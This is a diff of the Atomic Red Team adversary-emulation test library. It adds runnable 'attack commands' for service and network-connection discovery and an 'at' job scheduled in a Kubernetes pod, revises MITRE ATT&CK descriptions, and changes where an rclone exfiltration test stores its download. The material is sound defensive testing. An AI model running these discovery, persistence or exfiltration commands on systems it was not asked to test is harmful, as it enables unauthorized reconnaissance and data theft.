| | | | | [Impair Defenses: Impair Command History Logging](../../T1562.003/T1562.003.md) | | | | | | | |
|
||||
| | | | | Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | |
|
||||
| | | | | Selective Exclusion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Delay Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Signed Binary Proxy Execution: Compiled HTML File](../../T1218.001/T1218.001.md) | | | | | | | |
|
||||
| | | | | [Indicator Removal on Host: Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | |
|
||||
| | | | | [Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md) | | | | | | | |
|
||||
| | | | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Browser Fingerprint [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Process Injection: Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | |
|
||||
|
||||
+4767
-10369
File diff suppressed because it is too large
Load Diff
+5003
-10375
File diff suppressed because it is too large
Load Diff
+4767
-10369
File diff suppressed because it is too large
Load Diff
+4767
-10369
File diff suppressed because it is too large
Load Diff
+4767
-10369
File diff suppressed because it is too large
Load Diff
+4769
-10371
File diff suppressed because it is too large
Load Diff
+4767
-10369
File diff suppressed because it is too large
Load Diff
+4767
-10369
File diff suppressed because it is too large
Load Diff
+5511
-10400
File diff suppressed because it is too large
Load Diff
+4921
-10371
File diff suppressed because it is too large
Load Diff
+4822
-10373
File diff suppressed because it is too large
Load Diff
+4767
-10369
File diff suppressed because it is too large
Load Diff
+4767
-10369
File diff suppressed because it is too large
Load Diff
+5127
-10395
File diff suppressed because it is too large
Load Diff
@@ -2,7 +2,7 @@
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1005)
|
||||
<blockquote>
|
||||
|
||||
Adversaries may search local system sources, such as file systems, configuration files, local databases, or virtual machine files, to find files of interest and sensitive data prior to Exfiltration.
|
||||
Adversaries may search local system sources, such as file systems, configuration files, local databases, virtual machine files, or process memory, to find files of interest and sensitive data prior to Exfiltration.
|
||||
|
||||
Adversaries may do this using a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106) as well as a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008), which have functionality to interact with the file system to gather information.(Citation: show_run_config_cmd_cisco) Adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.
|
||||
|
||||
|
||||
+139
-2
@@ -2,7 +2,7 @@
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1007)
|
||||
<blockquote>
|
||||
|
||||
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>.
|
||||
Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as <code>sc query</code>, <code>tasklist /svc</code>, <code>systemctl --type=service</code>, and <code>net start</code>. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.(Citation: Elastic Security Labs GOSAR 2024)(Citation: SentinelLabs macOS Malware 2021)(Citation: Splunk Linux Gormir 2024)(Citation: Aquasec Kinsing 2020)
|
||||
|
||||
Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
|
||||
|
||||
@@ -18,6 +18,14 @@ Adversaries may use the information from [System Service Discovery](https://atta
|
||||
|
||||
- [Atomic Test #4 - Get-Service Execution](#atomic-test-4---get-service-execution)
|
||||
|
||||
- [Atomic Test #5 - System Service Discovery - macOS launchctl](#atomic-test-5---system-service-discovery---macos-launchctl)
|
||||
|
||||
- [Atomic Test #6 - System Service Discovery - Windows Scheduled Tasks (schtasks)](#atomic-test-6---system-service-discovery---windows-scheduled-tasks-schtasks)
|
||||
|
||||
- [Atomic Test #7 - System Service Discovery - Services Registry Enumeration](#atomic-test-7---system-service-discovery---services-registry-enumeration)
|
||||
|
||||
- [Atomic Test #8 - System Service Discovery - Linux init scripts](#atomic-test-8---system-service-discovery---linux-init-scripts)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -40,7 +48,7 @@ Upon successful execution, cmd.exe will execute service commands with expected r
|
||||
|
||||
|
||||
```cmd
|
||||
tasklist.exe
|
||||
tasklist.exe /svc
|
||||
sc query
|
||||
sc query state= all
|
||||
```
|
||||
@@ -145,4 +153,133 @@ powershell.exe Get-Service
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - System Service Discovery - macOS launchctl
|
||||
Enumerates services on macOS using launchctl. Used by adversaries for
|
||||
identifying daemons, background services, and persistence mechanisms.
|
||||
|
||||
**Supported Platforms:** macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** 9b378962-a75e-4856-b117-2503d6dcebba
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
launchctl list
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #6 - System Service Discovery - Windows Scheduled Tasks (schtasks)
|
||||
Enumerates scheduled tasks on Windows using schtasks.exe.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `command_prompt`!
|
||||
|
||||
|
||||
```cmd
|
||||
schtasks /query /fo LIST /v
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - System Service Discovery - Services Registry Enumeration
|
||||
Enumerates Windows services by reading the Services registry key
|
||||
(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
|
||||
Manager APIs or CLI tools such as sc.exe or Get-Service.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** d70d82bd-bb00-4837-b146-b40d025551b2
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
|
||||
ForEach-Object {
|
||||
$p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
|
||||
[PSCustomObject]@{
|
||||
Name = $_.PSChildName
|
||||
DisplayName = $p.DisplayName
|
||||
ImagePath = $p.ImagePath
|
||||
StartType = $p.Start
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #8 - System Service Discovery - Linux init scripts
|
||||
Enumerates system services by listing SysV init scripts and runlevel
|
||||
symlinks under /etc/init.d and /etc/rc*.d.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 8f2a5d2b-4018-46d4-8f3f-0fea53754690
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
echo "[*] Listing SysV init scripts (/etc/init.d):"
|
||||
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
|
||||
echo
|
||||
echo "[*] Listing runlevel directories (/etc/rc*.d):"
|
||||
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -11,7 +11,7 @@ atomic_tests:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
tasklist.exe
|
||||
tasklist.exe /svc
|
||||
sc query
|
||||
sc query state= all
|
||||
name: command_prompt
|
||||
@@ -53,3 +53,60 @@ atomic_tests:
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: powershell.exe Get-Service
|
||||
- name: System Service Discovery - macOS launchctl
|
||||
auto_generated_guid: 9b378962-a75e-4856-b117-2503d6dcebba
|
||||
description: |
|
||||
Enumerates services on macOS using launchctl. Used by adversaries for
|
||||
identifying daemons, background services, and persistence mechanisms.
|
||||
supported_platforms:
|
||||
- macos
|
||||
executor:
|
||||
name: sh
|
||||
command: launchctl list
|
||||
- name: System Service Discovery - Windows Scheduled Tasks (schtasks)
|
||||
auto_generated_guid: 7cd7eaa3-9ccc-460d-96d2-c6fb13e6d58a
|
||||
description: |
|
||||
Enumerates scheduled tasks on Windows using schtasks.exe.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
name: command_prompt
|
||||
command: schtasks /query /fo LIST /v
|
||||
|
||||
- name: System Service Discovery - Services Registry Enumeration
|
||||
auto_generated_guid: d70d82bd-bb00-4837-b146-b40d025551b2
|
||||
description: |
|
||||
Enumerates Windows services by reading the Services registry key
|
||||
(HKLM\SYSTEM\CurrentControlSet\Services) instead of using Service Control
|
||||
Manager APIs or CLI tools such as sc.exe or Get-Service.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
name: powershell
|
||||
command: |
|
||||
Get-ChildItem -Path 'HKLM:\SYSTEM\CurrentControlSet\Services' |
|
||||
ForEach-Object {
|
||||
$p = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
|
||||
[PSCustomObject]@{
|
||||
Name = $_.PSChildName
|
||||
DisplayName = $p.DisplayName
|
||||
ImagePath = $p.ImagePath
|
||||
StartType = $p.Start
|
||||
}
|
||||
}
|
||||
|
||||
- name: System Service Discovery - Linux init scripts
|
||||
auto_generated_guid: 8f2a5d2b-4018-46d4-8f3f-0fea53754690
|
||||
description: |
|
||||
Enumerates system services by listing SysV init scripts and runlevel
|
||||
symlinks under /etc/init.d and /etc/rc*.d.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
command: |
|
||||
echo "[*] Listing SysV init scripts (/etc/init.d):"
|
||||
if [ -d /etc/init.d ]; then ls -l /etc/init.d; else echo "/etc/init.d not present on this system"; fi
|
||||
echo
|
||||
echo "[*] Listing runlevel directories (/etc/rc*.d):"
|
||||
ls -ld /etc/rc*.d 2>/dev/null || echo "No /etc/rc*.d directories found"
|
||||
|
||||
@@ -4,7 +4,9 @@
|
||||
|
||||
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits)
|
||||
|
||||
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor, Master Boot Record, or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
|
||||
Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a hypervisor or [System Firmware](https://attack.mitre.org/techniques/T1542/001). (Citation: Wikipedia Rootkit) Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)
|
||||
|
||||
Rootkits that reside or modify boot sectors are known as [Bootkit](https://attack.mitre.org/techniques/T1542/003)s and specifically target the boot process of the operating system.
|
||||
|
||||
</blockquote>
|
||||
|
||||
|
||||
@@ -2,7 +2,7 @@
|
||||
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1016/001)
|
||||
<blockquote>
|
||||
|
||||
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites.
|
||||
Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), <code>tracert</code>, and GET requests to websites, or performing initial speed testing to confirm bandwidth.
|
||||
|
||||
Adversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.
|
||||
|
||||
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -8,7 +8,7 @@ Adversaries may establish persistence by adding a malicious binary path or shell
|
||||
|
||||
Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as ESXi hypervisors, IoT, or embedded systems.(Citation: intezer-kaiji-malware) As ESXi servers store most system files in memory and therefore discard changes on shutdown, leveraging `/etc/rc.local.d/local.sh` is one of the few mechanisms for enabling persistence across reboots.(Citation: Juniper Networks ESXi Backdoor 2022)
|
||||
|
||||
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004).(Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
|
||||
Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of Launchd.(Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)
|
||||
|
||||
</blockquote>
|
||||
|
||||
|
||||
Binary file not shown.
@@ -193,10 +193,11 @@ atomic_tests:
|
||||
fsutil file createnew C:\Users\Public\Downloads\exfil.zip 20485760
|
||||
- description: 'Check if rclone zip exists'
|
||||
prereq_command: |
|
||||
if (Test-Path C:\Users\Public\Downloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
|
||||
if (Test-Path PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip) {exit 0} else {exit 1}
|
||||
get_prereq_command: |
|
||||
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "C:\Users\Public\Downloads\rclone-current-windows-amd64.zip"
|
||||
Expand-Archive C:\Users\Public\Downloads\rclone-current-windows-amd64.zip -DestinationPath C:\Users\Public\Downloads\
|
||||
New-Item -Path PathToAtomicsFolder\..\ExternalPayloads -ItemType Directory -Force | Out-Null
|
||||
Invoke-WebRequest -Uri "https://downloads.rclone.org/rclone-current-windows-amd64.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip"
|
||||
Expand-Archive PathToAtomicsFolder\..\ExternalPayloads\rclone-current-windows-amd64.zip -DestinationPath PathToAtomicsFolder\..\ExternalPayloads\
|
||||
executor:
|
||||
command: |-
|
||||
$rclone_bin = Get-ChildItem C:\Users\Public\Downloads\ -Recurse -Include "rclone.exe" | Select-Object -ExpandProperty FullName
|
||||
|
||||
+110
-8
@@ -16,9 +16,15 @@ Utilities and commands that acquire this information include [netstat](https://a
|
||||
|
||||
- [Atomic Test #2 - System Network Connections Discovery with PowerShell](#atomic-test-2---system-network-connections-discovery-with-powershell)
|
||||
|
||||
- [Atomic Test #3 - System Network Connections Discovery FreeBSD, Linux & MacOS](#atomic-test-3---system-network-connections-discovery-freebsd-linux--macos)
|
||||
- [Atomic Test #3 - System Network Connections Discovery via PowerShell (Process Mapping)](#atomic-test-3---system-network-connections-discovery-via-powershell-process-mapping)
|
||||
|
||||
- [Atomic Test #4 - System Discovery using SharpView](#atomic-test-4---system-discovery-using-sharpview)
|
||||
- [Atomic Test #4 - System Network Connections Discovery via ss or lsof (Linux/MacOS)](#atomic-test-4---system-network-connections-discovery-via-ss-or-lsof-linuxmacos)
|
||||
|
||||
- [Atomic Test #5 - System Network Connections Discovery FreeBSD, Linux & MacOS](#atomic-test-5---system-network-connections-discovery-freebsd-linux--macos)
|
||||
|
||||
- [Atomic Test #6 - System Network Connections Discovery via sockstat (Linux, FreeBSD)](#atomic-test-6---system-network-connections-discovery-via-sockstat-linux-freebsd)
|
||||
|
||||
- [Atomic Test #7 - System Discovery using SharpView](#atomic-test-7---system-discovery-using-sharpview)
|
||||
|
||||
|
||||
<br/>
|
||||
@@ -26,7 +32,8 @@ Utilities and commands that acquire this information include [netstat](https://a
|
||||
## Atomic Test #1 - System Network Connections Discovery
|
||||
Get a listing of network connections.
|
||||
|
||||
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
|
||||
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires
|
||||
elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
@@ -42,9 +49,9 @@ Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net se
|
||||
|
||||
|
||||
```cmd
|
||||
netstat
|
||||
netstat -ano
|
||||
net use
|
||||
net sessions
|
||||
net sessions 2>nul
|
||||
```
|
||||
|
||||
|
||||
@@ -57,7 +64,6 @@ net sessions
|
||||
|
||||
## Atomic Test #2 - System Network Connections Discovery with PowerShell
|
||||
Get a listing of network connections.
|
||||
|
||||
Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
@@ -85,7 +91,73 @@ Get-NetTCPConnection
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - System Network Connections Discovery FreeBSD, Linux & MacOS
|
||||
## Atomic Test #3 - System Network Connections Discovery via PowerShell (Process Mapping)
|
||||
Enumerate TCP connections and map to owning process names via PowerShell.
|
||||
|
||||
**Supported Platforms:** Windows
|
||||
|
||||
|
||||
**auto_generated_guid:** b52c8233-8f71-4bd7-9928-49fec8215cf5
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `powershell`!
|
||||
|
||||
|
||||
```powershell
|
||||
Get-NetTCPConnection | ForEach-Object {
|
||||
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
|
||||
[pscustomobject]@{
|
||||
Local = "$($_.LocalAddress):$($_.LocalPort)"
|
||||
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
|
||||
State = $_.State
|
||||
PID = $_.OwningProcess
|
||||
Process = if ($p) { $p.ProcessName } else { $null }
|
||||
}
|
||||
} | Sort-Object State,Process | Format-Table -AutoSize
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - System Network Connections Discovery via ss or lsof (Linux/MacOS)
|
||||
List active TCP/UDP network connections using ss, with lsof as a fallback
|
||||
when ss is unavailable. Serves as an alternative to the netstat-based test.
|
||||
|
||||
**Supported Platforms:** Linux, macOS
|
||||
|
||||
|
||||
**auto_generated_guid:** bcf05343-ef1d-4052-8a27-b00c9be42b9f
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #5 - System Network Connections Discovery FreeBSD, Linux & MacOS
|
||||
Get a listing of network connections.
|
||||
|
||||
Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
|
||||
@@ -128,7 +200,37 @@ echo "Install netstat on the machine."; exit 1;
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #4 - System Discovery using SharpView
|
||||
## Atomic Test #6 - System Network Connections Discovery via sockstat (Linux, FreeBSD)
|
||||
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
|
||||
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 997bb0a6-421e-40c7-b5d2-0f493904ef9b
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Attack Commands: Run with `sh`!
|
||||
|
||||
|
||||
```sh
|
||||
sockstat -4
|
||||
sockstat -6 2>/dev/null || true
|
||||
sockstat -l 2>/dev/null || true
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #7 - System Discovery using SharpView
|
||||
Get a listing of network connections, domains, domain users, and etc.
|
||||
sharpview.exe located in the bin folder, an opensource red-team tool.
|
||||
Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
|
||||
|
||||
@@ -5,21 +5,21 @@ atomic_tests:
|
||||
auto_generated_guid: 0940a971-809a-48f1-9c4d-b1d785e96ee5
|
||||
description: |
|
||||
Get a listing of network connections.
|
||||
|
||||
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. Results will output via stdout.
|
||||
|
||||
Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires
|
||||
elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
netstat
|
||||
netstat -ano
|
||||
net use
|
||||
net sessions
|
||||
net sessions 2>nul
|
||||
name: command_prompt
|
||||
- name: System Network Connections Discovery with PowerShell
|
||||
auto_generated_guid: f069f0f1-baad-4831-aa2b-eddac4baac4a
|
||||
description: |
|
||||
Get a listing of network connections.
|
||||
|
||||
Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
|
||||
supported_platforms:
|
||||
- windows
|
||||
@@ -27,6 +27,40 @@ atomic_tests:
|
||||
command: |
|
||||
Get-NetTCPConnection
|
||||
name: powershell
|
||||
|
||||
- name: System Network Connections Discovery via PowerShell (Process Mapping)
|
||||
auto_generated_guid: b52c8233-8f71-4bd7-9928-49fec8215cf5
|
||||
description: |
|
||||
Enumerate TCP connections and map to owning process names via PowerShell.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
name: powershell
|
||||
command: |
|
||||
Get-NetTCPConnection | ForEach-Object {
|
||||
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
|
||||
[pscustomobject]@{
|
||||
Local = "$($_.LocalAddress):$($_.LocalPort)"
|
||||
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
|
||||
State = $_.State
|
||||
PID = $_.OwningProcess
|
||||
Process = if ($p) { $p.ProcessName } else { $null }
|
||||
}
|
||||
} | Sort-Object State,Process | Format-Table -AutoSize
|
||||
|
||||
- name: System Network Connections Discovery via ss or lsof (Linux/MacOS)
|
||||
auto_generated_guid: bcf05343-ef1d-4052-8a27-b00c9be42b9f
|
||||
description: |
|
||||
List active TCP/UDP network connections using ss, with lsof as a fallback
|
||||
when ss is unavailable. Serves as an alternative to the netstat-based test.
|
||||
supported_platforms:
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
name: bash
|
||||
command: |
|
||||
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
|
||||
|
||||
- name: System Network Connections Discovery FreeBSD, Linux & MacOS
|
||||
auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
|
||||
description: |
|
||||
@@ -49,6 +83,19 @@ atomic_tests:
|
||||
netstat
|
||||
who -a
|
||||
name: sh
|
||||
|
||||
- name: System Network Connections Discovery via sockstat (Linux, FreeBSD)
|
||||
auto_generated_guid: 997bb0a6-421e-40c7-b5d2-0f493904ef9b
|
||||
description: |
|
||||
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
|
||||
supported_platforms:
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
command: |
|
||||
sockstat -4
|
||||
sockstat -6 2>/dev/null || true
|
||||
sockstat -l 2>/dev/null || true
|
||||
|
||||
- name: System Discovery using SharpView
|
||||
auto_generated_guid: 96f974bb-a0da-4d87-a744-ff33e73367e9
|
||||
|
||||
@@ -18,6 +18,8 @@ In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/
|
||||
|
||||
- [Atomic Test #2 - At - Schedule a job](#atomic-test-2---at---schedule-a-job)
|
||||
|
||||
- [Atomic Test #3 - At - Schedule a job via kubectl in a Pod](#atomic-test-3---at---schedule-a-job-via-kubectl-in-a-pod)
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -104,4 +106,53 @@ echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `syste
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
<br/>
|
||||
|
||||
## Atomic Test #3 - At - Schedule a job via kubectl in a Pod
|
||||
Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
|
||||
and submits a job with `at`. The pod is deleted after execution.
|
||||
|
||||
**Supported Platforms:** Containers
|
||||
|
||||
|
||||
**auto_generated_guid:** 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
#### Inputs:
|
||||
| Name | Description | Type | Default Value |
|
||||
|------|-------------|------|---------------|
|
||||
| image_name | Name of the image | string | ubuntu|
|
||||
| pod_name | K8s pod name to execute the command in | string | atomic-at-schedule|
|
||||
| time_spec | Time specification of when the command should run | string | now + 1 minute|
|
||||
| at_command | The command to be run | string | echo Hello from Atomic Red Team|
|
||||
|
||||
|
||||
#### Attack Commands: Run with `bash`!
|
||||
|
||||
|
||||
```bash
|
||||
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo '#{at_command}' | at #{time_spec} && at -l"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
#### Dependencies: Run with `bash`!
|
||||
##### Description: kubectl must be installed and configured
|
||||
##### Check Prereq Commands:
|
||||
```bash
|
||||
which kubectl
|
||||
```
|
||||
##### Get Prereq Commands:
|
||||
```bash
|
||||
echo "kubectl must be installed manually"
|
||||
```
|
||||
|
||||
|
||||
|
||||
|
||||
<br/>
|
||||
|
||||
@@ -54,3 +54,38 @@ atomic_tests:
|
||||
elevation_required: false
|
||||
command: |-
|
||||
echo "#{at_command}" | at #{time_spec}
|
||||
- name: At - Schedule a job via kubectl in a Pod
|
||||
auto_generated_guid: 9ddf2e5e-7e2c-46c2-9940-3c2ff29c7213
|
||||
description: |
|
||||
Launches a short-lived Ubuntu pod, installs the `at` utility, starts the `atd` daemon,
|
||||
and submits a job with `at`. The pod is deleted after execution.
|
||||
supported_platforms:
|
||||
- containers
|
||||
input_arguments:
|
||||
image_name:
|
||||
description: Name of the image
|
||||
type: string
|
||||
default: ubuntu
|
||||
pod_name:
|
||||
description: K8s pod name to execute the command in
|
||||
type: string
|
||||
default: atomic-at-schedule
|
||||
time_spec:
|
||||
description: Time specification of when the command should run
|
||||
type: string
|
||||
default: now + 1 minute
|
||||
at_command:
|
||||
description: The command to be run
|
||||
type: string
|
||||
default: echo Hello from Atomic Red Team
|
||||
dependencies:
|
||||
- description: kubectl must be installed and configured
|
||||
get_prereq_command: |
|
||||
echo "kubectl must be installed manually"
|
||||
prereq_command: |
|
||||
which kubectl
|
||||
executor:
|
||||
name: bash
|
||||
elevation_required: false
|
||||
command: |
|
||||
kubectl run #{pod_name} --image=#{image_name} --restart=Never --attach --rm -i -- bash -lc "apt-get update -y >/dev/null 2>&1 && apt-get install -y at >/dev/null 2>&1 && (atd || /usr/sbin/atd) && echo '#{at_command}' | at #{time_spec} && at -l"
|
||||
|
||||
@@ -4,7 +4,7 @@
|
||||
|
||||
